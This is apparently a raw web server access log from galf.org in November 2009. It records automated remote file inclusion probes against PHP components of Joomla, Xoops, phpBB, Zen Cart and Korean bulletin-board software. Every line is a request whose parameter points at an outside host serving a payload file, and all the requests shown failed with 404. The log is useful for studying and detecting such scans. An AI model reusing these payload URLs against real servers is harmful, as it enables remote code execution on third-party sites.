70.38.31.183 - - [22/Nov/2009:21:39:57 -0800] "GET /logs/access_090713.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:39:59 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:00 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:01 -0800] "GET /logs/access_090713.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:07 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:07 -0800] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:08 -0800] "GET /logs/access_090713.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:30 -0800] "GET /logs/access_090921.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:33 -0800] "GET /logs/access_090921.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:40:33 -0800] "GET /logs/access_090921.log%20%20//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:41:27 -0800] "GET /logs/access_090921.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:41:36 -0800] "GET /logs/access_090921.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.38.31.183 - - [22/Nov/2009:21:41:38 -0800] "GET /logs/access_090921.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:44:28 -0800] "GET /logs/access_090713.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:44:28 -0800] "GET /com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:44:28 -0800] "GET /logs//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:45:16 -0800] "GET /logs/access_090629.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:45:24 -0800] "GET /logs/access_090713.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [22/Nov/2009:21:45:43 -0800] "GET /logs/access_090713.log//components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.63.60.50 - - [22/Nov/2009:21:47:59 -0800] "GET /logs/access.log//com_mp3_allopass/allopass.php?mosConfig_live_site=http://n34.biz/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:55:58 -0800] "GET /logs//modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:55:58 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:55:59 -0800] "GET /logs/access_091102.log%20%20//modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:56:03 -0800] "GET /logs/access_091102.log%20%20//modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:56:03 -0800] "GET /modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:21:56:04 -0800] "GET /logs//modules//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:23 -0800] "GET /logs//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:23 -0800] "GET /logs/access_090504.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:23 -0800] "GET /bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:33 -0800] "GET /logs//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:33 -0800] "GET /logs/access_090504.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:33 -0800] "GET /bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:37 -0800] "GET /bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:37 -0800] "GET /logs/access_090504.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:56:37 -0800] "GET /logs//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:59:17 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:59:27 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:21:59:31 -0800] "GET /logs/access_091102.log%20%20//bbs//skin/gallery/write.php?dir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:22:00:50 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:22:00:50 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:22:01:05 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "galf.org"
64.22.119.110 - - [22/Nov/2009:22:01:05 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:03 -0800] "GET /setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:03 -0800] "GET /logs//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:04 -0800] "GET /logs/access_091026.log//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:19 -0800] "GET /logs/access_091026.log%20%20//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:19 -0800] "GET /setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:19 -0800] "GET /logs//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:23 -0800] "GET /logs/access_090817.log%20%20//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [22/Nov/2009:22:12:33 -0800] "GET /logs/access_090817.log//setup.php?dir=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:22:14:05 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:22:14:05 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:22:14:06 -0800] "GET /logs/access_090720.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [22/Nov/2009:22:14:20 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.79.234.43 - - [22/Nov/2009:22:14:29 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:18:47 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:18:47 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:18:49 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:19:11 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:51 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:52 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:52 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:52 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:52 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:53 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:55 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:55 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:19:55 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:20:09 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:20:09 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:20:09 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:20:13 -0800] "GET /logs/access_090928.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:20:13 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:20:13 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:20:15 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:20:15 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:20:20 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:20:21 -0800] "GET /logs/access_090720.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:20:37 -0800] "GET /logs/access_090720.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:20:40 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:20:45 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:21:22 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:21:28 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
217.24.195.67 - - [22/Nov/2009:22:21:32 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:21:34 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:21:54 -0800] "GET /logs/access_090720.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:21:54 -0800] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:08 -0800] "GET /logs/access_090720.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:08 -0800] "GET /logs/access_090824.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:15 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:17 -0800] "GET /logs/access_090720.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:19 -0800] "GET /logs/access_090824.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.206.72 - - [22/Nov/2009:22:22:23 -0800] "GET /logs/access_090824.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:25 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:27 -0800] "GET /logs/access_090720.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:27 -0800] "GET /logs/access_090824.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:30 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.shoppingxxxsource.com/source/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:39 -0800] "GET /logs/access_090928.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:22:45 -0800] "GET /logs/access_090720.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.98.136.21 - - [22/Nov/2009:22:22:45 -0800] "GET /logs/access_090824.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.vnmhost.net/01.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.42.146.14 - - [22/Nov/2009:22:22:58 -0800] "GET /logs/access_091012.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.logica-tech.com/foto/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:23:01 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:24:37 -0800] "GET /logs/access_090817.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:24:37 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:24:37 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:27:43 -0800] "GET /logs/access_091012.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:28:18 -0800] "GET /logs/access_090817.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:28:18 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:28:18 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
69.175.66.34 - - [22/Nov/2009:22:29:30 -0800] "GET /logs/access_091012.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://jeep.org.ua/files/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:30:16 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:30:16 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:30:16 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
